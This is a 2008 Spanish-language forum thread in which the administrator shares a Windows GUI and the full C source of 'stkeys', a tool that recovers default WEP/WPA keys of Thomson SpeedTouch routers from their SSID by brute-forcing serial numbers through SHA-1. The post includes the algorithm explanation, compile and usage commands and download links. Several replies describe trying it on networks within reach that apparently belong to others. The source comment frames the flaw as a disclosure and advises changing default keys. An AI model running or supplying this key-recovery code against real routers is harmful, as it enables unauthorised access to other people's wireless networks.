Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
Viladecans Enero 07, 2009, 03:21:02
Inicio Ayuda Ingresar Registrarse

RadioSevenMedia - Estudio de redes wireless ERW 2.4  - Stkeys gui-wpa - WinTele2
HTPC "Home Theater PC - eFeTePe

+ Lampiweb.com
|-+ Wireless
| |-+ Auditoria Windows (Moderadores: Frodo, icehot)
| | |-+ La WPA de los SpeedTouch con STKEYS GUI - WPA Windows
Páginas: [1] 2 3 4   Ir Abajo
« anterior próximo »
Imprimir
Autor Tema: La WPA de los SpeedTouch con STKEYS GUI - WPA Windows  (Leído 12746 veces)
0 Usuarios y 1 Visitante están viendo este tema.
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« : Abril 18, 2008, 10:04:47 »
stkeys ya esta compilado para windows lo saco del foro de tio mierda y por lo que leo se ve que no se que de algorritmo y tal y muchos numeros pero por lo que se ve funciona, asi que meteremos el stkeys en el erw y ya tenemos otro en la saca  Sonreir ya era hora que se animase el tema de la wpa aunque esto solo funciona con los Thomson modelos 580i i 585v6 y quizas alguno mas.
Default WEP/WPA key algorithm for Thomson routers
Citar
El algoritmo se encontró en el interior de la stInstall.exe
La versión se distribuye en España por ORANGE
Kevin Devine



Donwload STKEYS GUI -WPA windows
http://www.mediafire.com/?svyenmddzm3







Y esto lo de siempre al llevar embebidos algunos antivirus dan falso positivos.
« Última modificación: Abril 21, 2008, 11:38:33 por lampi » En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #1 : Abril 18, 2008, 10:18:14 »
Seria de utilidad que el que tenga en casa una de estas, me pase el ssid y la pass para probarlo y si rula bien, metemos el stkeys en el erw y sera mas comodo para todos.

[ Default WEP/WPA key algorithm for Thomson routers ]
*************************************************
Author: Kevin Devine <wyse101 0x40 gmail.com>
Date:   April 2008

Codigo y documentacion



/*
   **************************************************************************
   *                                                                        *
   * Default WEP/WPA key generation for Thomson series wireless routers     *
   *                                                                        *
   *   Date: March 15th 2008                                                *
   *   Author: Kevin Devine <wyse101@gmail.com>                             *
   *                                                                        *
   **************************************************************************

   AFAIK, this is a well known problem by some ISP.
   It is likely to affect any owner of a Thomson wireless router with
   default settings installed.

   **************************************************************************

   The format of a serial number:

   CP YY WW PP XXX (CC)

   And from what i can tell of the following serial number taken from
   router i received.

   CP 06 15 JT 109 (53)

   YY is the year produced.      ( 2006  ) ?
   WW is the week of year.       ( some week of April ) ?
   PP is the production code.    ( JT ) factory code?
   CC is the configuration code. ( 53 ) seems to be 00 - ZZ (0-9/A-Z)

   I can only guess that the XXX values represent the unit number

   **************************************************************************

   The key generation is simple enough.

   Take as example: "CP0615JT109 (53)"

   Remove the CC and PP values

     "CP0615109"

   Convert the XXX values to hexadecimal.

     "CP0615313039"

   Process with SHA-1

     742da831d2b657fa53d347301ec610e1ebf8a3d0

   The last 3 bytes are converted to 6 byte string, and appended to
   the word "SpeedTouch" which becomes the default SSID.

     "SpeedTouchF8A3D0"

   The first 5 bytes are converted to a 10 byte string which
   becomes the default WEP/WPA key.

    "742DA831D2"

   Thats it..
   **************************************************************************

   I was unable to determine if its possible to obtain the base serial
   number from the MAC, but it can't be ruled out.

   The method of recovery here using brute force attack of the
   default SSID octets, is pretty lame..but is enough for now.

   Theoretically, with 3 octets, no more than ~2 attempts are required
   before successfully accessing the router.

   When only 2 octets are provided, (example:BT Voyager/Home Hub routers)
   more potential keys are generated, with further required attempts -
   an average of 80.

   This still improves odds of an attacker gaining access
   to WPA protected routers - more so if an attacker can capture a WPA
   handshake and crack with Aircrack,Cain & Abel or offline with coWPAtty.
   
   Obviously the problem is with implementation of key/ssid generation
   and not WPA itself.
   **************************************************************************
   
   The only solution _right now_ is to have customers either turn off wireless
   (if its not being used), or change the default settings.

   To compile, use:

     gcc -fomit-frame-pointer -O3 -funroll-all-loops stkeys.c sha1.c -ostkeys
   
   Use OpenSSL SHA-1 for this to run faster..
   
   Example usage for ST585v6 router:
     
      SSID: "SpeedTouchF8A3D0":

   c:\stkeys -v -iF8A3D0

   Serial Number: CP0615**109 - potential key = 742DA831D2  <- this is the right one
   Serial Number: CP0621**AHJ - potential key = 00651124D9

   Found 2 potential keys.

*/

#include <stdio.h>
#include <getopt.h>

#include "sha1.h"

#define SHA1Init SHA1Reset
#define SHA1Update SHA1Input
#define SHA1Final SHA1Result
#define SHA1_CTX SHA1Context

typedef unsigned char u8;
typedef unsigned int u32;

const u8 charTable[]="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
const u8 hexTable[]="0123456789ABCDEF";
      u8 serial[13]={'C','P','0',0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

#define SERIAL_LENGTH 12
#define MAX_SSID_OCTETS 6
#define DEFAULT_KEY_SIZE 5

#define hexmsb(x)(hexTable[((x & 0xf0) >> 4)])
#define hexlsb(x)(hexTable[ (x & 0x0f)])

void usage(char **argv) {

    fprintf(stdout,"\n\tUso: %s [ -i <ssid octets> ] [ -o <output file> ]\n"
                   "\n\t -i : Los octetos hexadecimales del SSID del router Thomson"
                   "\n\t -o : Especificar el fichero de salida para las posibles claves"
                   "\n\t -v : Imprime en pantalla las posibles claves encontradas\n\n",*argv);
                 
    exit(0);
}

/*
 * convert hexadecimal ssid string to binary
 * return 0 on error or binary length of string
 *
 */
u32 str2ssid(u8 ssid[],u8 *str) {

    u8 *p,*q = ssid;
    u32 len = strlen(str);

    if( (len % 2) || (len > MAX_SSID_OCTETS) )
      return(0);

    for(p = str;(*p = toupper(*p)) && (strchr(hexTable,*p)) != 0;) {

      if(--len % 2) {
        *q = ((u8*)strchr(hexTable,*p++) - hexTable);
        *q <<= 4;
      }else {
        *q++ |= ((u8*)strchr(hexTable,*p++) - hexTable);
      }
    }
    return( (len) ? 0 : (p - str) / 2);
}

/*
 * print 5 bytes to output file
 *
 */
void dump_key(FILE *out, u8 *key) {
 
    u32 i;
    u8 *p = key;

    for(i = 0;i < DEFAULT_KEY_SIZE;i++)
      fprintf(out,"%.2X",*p++);

    fprintf(out,"\n");
}

int main(int argc, char **argv) {

    u8 sha1_digest[40]={0};
    u8 ssid[8]={0},buf[8]={0},year,week,x1,x2,x3;
    u32 keys = 0,ssidLen = 0,verbose = 0, opt = 0;
    u8 *p,*q,*strId = NULL;
    FILE *ofile = NULL;

    SHA1_CTX sha1_ctx;

    if(argc > 1) {
      while( (opt = getopt(argc, argv,"vo:i:")) != -1) {

        switch(opt) {

          case 'i' :
            strId = optarg;
            break;

          case 'o' :
            if((ofile = fopen(optarg,"wb")) == NULL) {
              fprintf(stderr,"\nNo puedo abrir %s para la salida.\n",optarg);
              return(0);
            }
            break;

          case 'v' :
            verbose++;
            break;

          default:
            usage(argv);
        }
      }

      if(!strId) usage(argv);

      if(!(ssidLen = str2ssid(ssid,strId))) usage(argv);

      fprintf(stdout,"\nGenerando claves... por favor espera\n\n");

        // generate values only for 2005/2007..change if you want.

        for(year = 5;year <= 7;year++) {

          serial[3] = year | '0';

          // 52 weeks of the year

          for(week = 1;week <= 52;week++) {
           
            serial[4] = (week / 10) + '0';
            serial[5] = (week % 10) + '0';

            for(x1 = 0;x1 < 36;x1++) {

              serial[6] = hexmsb(charTable[x1]);
              serial[7] = hexlsb(charTable[x1]);

              for(x2 = 0;x2 < 36;x2++) {

                serial[8] = hexmsb(charTable[x2]);
                serial[9] = hexlsb(charTable[x2]);

                for(x3 = 0;x3 < 36;x3++) {

                  serial[10] = hexmsb(charTable[x3]);
                  serial[11] = hexlsb(charTable[x3]);

                  // hash serial number with sha-1

                  SHA1Init(&sha1_ctx);
                  SHA1Update(&sha1_ctx,serial,SERIAL_LENGTH);
                  SHA1Final(&sha1_ctx,sha1_digest);

                  // compare SSID octets with last number of bytes supplied

                  if(memcmp(&sha1_digest[(20-ssidLen)],ssid,ssidLen) == 0) {

                    keys++;

                    if(verbose) {

                      memcpy(buf,serial,6);

                      fprintf(stdout,
                              "Número de Serie: %s**%C%C%C - posible clave = ",
                              buf,charTable[x1],charTable[x2],charTable[x3]);

                      dump_key(stdout,sha1_digest);
                    }
                    if(ofile) {
                      dump_key(ofile,sha1_digest);
                    }
                  }
                }
              }
            }
          }
        }
      fprintf(stdout,"\nResultado: %d posibles claves.\n\n",keys);

      if(ofile) fclose(ofile);
    }
    else {
        usage(argv);
    }
    return(0);
}
« Última modificación: Abril 21, 2008, 11:49:26 por lampi » En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
icehot
Moderador Global
Usuario
*****
Desconectado Desconectado

Mensajes: 798


No estas Solo
« Respuesta #2 : Abril 18, 2008, 10:29:30 »
Creo que puedo conseguirte uno de un compi que tenia orange,se ha dado de baja pero supongo que la clave aun se la sabra.
He leido lo del foro de seguridad,estan super animados pues parece que es el primer paso para las wpa,me alegro ahora le toca a win2.
Un saludo
En línea
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #3 : Abril 18, 2008, 10:36:00 »
Algo es algo pero al no ser algo  estandar tampoco es para lanzar cohetes.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
icehot
Moderador Global
Usuario
*****
Desconectado Desconectado

Mensajes: 798


No estas Solo
« Respuesta #4 : Abril 18, 2008, 10:45:36 »
lampi el enlace del codigo fuente te remite a seguridad wire..donde esta Huh Huh,el stkeys lo tengo del enlace de su pag.pero sacado del foro.
En línea
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #5 : Abril 18, 2008, 10:54:52 »
Luego monto esta gui rapida, asi los que saben menos lo podran usar.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #6 : Abril 18, 2008, 10:56:39 »
Cita de: icehot en Abril 18, 2008, 10:45:36
lampi el enlace del codigo fuente te remite a seguridad wire..donde esta Huh Huh,el stkeys lo tengo del enlace de su pag.pero sacado del foro.


Es verdad, voy a ver.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #7 : Abril 18, 2008, 11:00:59 »
Ya va el link.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
icehot
Moderador Global
Usuario
*****
Desconectado Desconectado

Mensajes: 798


No estas Solo
« Respuesta #8 : Abril 18, 2008, 11:11:23 »
Ok compi,te miro lo dicho.
En línea
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #9 : Abril 18, 2008, 11:58:13 »
De aqui a un rato os lo cuelgo.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #10 : Abril 19, 2008, 12:26:48 »

La 1:30 me piro que mañana curro un poco.  Gi&ntilde;ar
« Última modificación: Abril 19, 2008, 09:38:37 por lampi » En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
nuevoporaqui
Usuario

Desconectado Desconectado

Mensajes: 12


Email
« Respuesta #11 : Abril 19, 2008, 09:33:40 »
Vamos a ver si funciona, tengo un cliente a mi alcance.

Gracias
En línea
acadaca
Usuario

Desconectado Desconectado

Mensajes: 37
« Respuesta #12 : Abril 19, 2008, 12:29:48 »
vamos a probar a ver que tal va esto, muchas gracias
En línea
Menargas
Moderador Global
Usuario
*****
Desconectado Desconectado

Mensajes: 610


menargas@hotmail.com
« Respuesta #13 : Abril 19, 2008, 12:33:31 »
Bueno algo es algo, ya tenemos escusa para soltar el erw 2.3 "automatic", ahora la cosa está en que alguien que tenga uno de estos routers lo pruebe

Un saludo
En línea
TOSTADO
Usuario

Desconectado Desconectado

Mensajes: 20


Email
« Respuesta #14 : Abril 19, 2008, 12:42:12 »
ola   estoy  conectado  en  una  rede   con  este  nome  SpeedTouch.lan  me   hizo  falta  cerca  de  4 milhones  de  ivs,  avia  una  clave  de  26 digitos    jajajaja     mas  voy  provar   este  ver  si  es  algo  mas  rapido
En línea
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #15 : Abril 19, 2008, 12:45:55 »
Cita de: TOSTADO en Abril 19, 2008, 12:42:12
ola   estoy  conectado  en  una  rede   con  este  nome  SpeedTouch.lan  me   hizo  falta  cerca  de  4 milhones  de  ivs,  avia  una  clave  de  26 digitos    jajajaja     mas  voy  provar   este  ver  si  es  algo  mas  rapido


Se dice que para la wep, el stkeys no es tan fiable pero asi puedes probarlo y dices si te da la misma key.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
erborricobueno
Moderador Global
Usuario
*****
Desconectado Desconectado

Mensajes: 899
« Respuesta #16 : Abril 19, 2008, 12:51:58 »
Los enlaces estan bien?
En línea
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #17 : Abril 19, 2008, 12:53:21 »
Al montarlo tan rapido me equivoque en la fecha 19/03/08 y estamos en Marzo pero ya no lo cambio por que se integrara en el erw cuando se pueda.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #18 : Abril 19, 2008, 12:54:08 »
Cita de: erborricobueno en Abril 19, 2008, 12:51:58
Los enlaces estan bien?

You requested stkeys-gui-wpa.exe (505.31 KB)
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
erborricobueno
Moderador Global
Usuario
*****
Desconectado Desconectado

Mensajes: 899
« Respuesta #19 : Abril 19, 2008, 12:55:22 »
Cita de: lampi en Abril 19, 2008, 12:54:08
Cita de: erborricobueno en Abril 19, 2008, 12:51:58
Los enlaces estan bien?

You requested stkeys-gui-wpa.exe (505.31 KB)

Digo el del código fuente
En línea
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #20 : Abril 19, 2008, 12:57:24 »
Se ve que tiene truco.  Cheesy ya los subire o para que ya tenemos la gui.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
erborricobueno
Moderador Global
Usuario
*****
Desconectado Desconectado

Mensajes: 899
« Respuesta #21 : Abril 19, 2008, 12:58:45 »
Cita de: lampi en Abril 19, 2008, 12:57:24
Se ve que tiene truco.  Cheesy ya los subire o para que ya tenemos la gui.

Subelo si puedes,quiero ver como va,gracias.
En línea
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #22 : Abril 19, 2008, 01:03:15 »
Aqui esta, el codigo y el compilado.

http://www.mediafire.com/?wxc1mginbtn



Me dicen que algunas redes solo tienen 4 ultimos digitos y no 6 por lo seguro que solo valen para las redes mas ultimas o ya leere un poco mas.
En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
erborricobueno
Moderador Global
Usuario
*****
Desconectado Desconectado

Mensajes: 899
« Respuesta #23 : Abril 19, 2008, 01:05:10 »
Cita de: lampi en Abril 19, 2008, 01:03:15
Aqui esta, el codigo y el compilado.

http://www.mediafire.com/?wxc1mginbtn



Me dicen que algunas redes solo tienen 4 ultimos digitos y no 6 por lo seguro que solo valen para las redes mas ultimas o ya leere un poco mas.



Tendré que buscar algún amig@ que me deje probar.
En línea
lampi
Administrator
El que se lo curra por ti
*****
Desconectado Desconectado

Mensajes: 5460


ViladeCans
« Respuesta #24 : Abril 19, 2008, 01:25:48 »
Segun leo el stkeys abarca este tipo de router de fabricacion desde el 2004 hasta el 2007 y seran ssid de tipo SpeedTouch123456
« Última modificación: Abril 21, 2008, 06:42:44 por lampi » En línea
No respondo por privado los temas del foro.

STKEYS GUI-WPA - WinTele2 GUI-WPA - New ERW 2.4 - eFeTePe
Páginas: [1] 2 3 4   Ir Arriba
Imprimir
« anterior próximo »
Ir a:  

Servicios Upload: Gigasize - Mediafire - Rapidshare - Imageshack Media: Snipshot - Tinypic - Youtube - Mp3tube
Si no puedes activar tu cuenta en el foro, procura poner un Email correcto. Hotmal no parace ir muy bien con SMF


Ingresar con nombre de usuario, contraseña y duración de la sesión



Manuales Wireless, Inyeccion de Aireplay en Windows con el ERW
ERW Manual/Opciones - Tarjetas soportadas Aireplay/Windows - Manual de Inyeccion ERW - Opciones Suite Aircrack-NG
ReInyeccion de paquetes - Ataque de Fragmentacion - La WPA facil con ERW - Cambiar la MAC con Etherchange
Problemas con el antivirus y el ERW - Cambio de drivers + Asociacion

Servicios de Interes
Linux wireless LAN support - Listado de DNS - Distrowatch
Virustotal -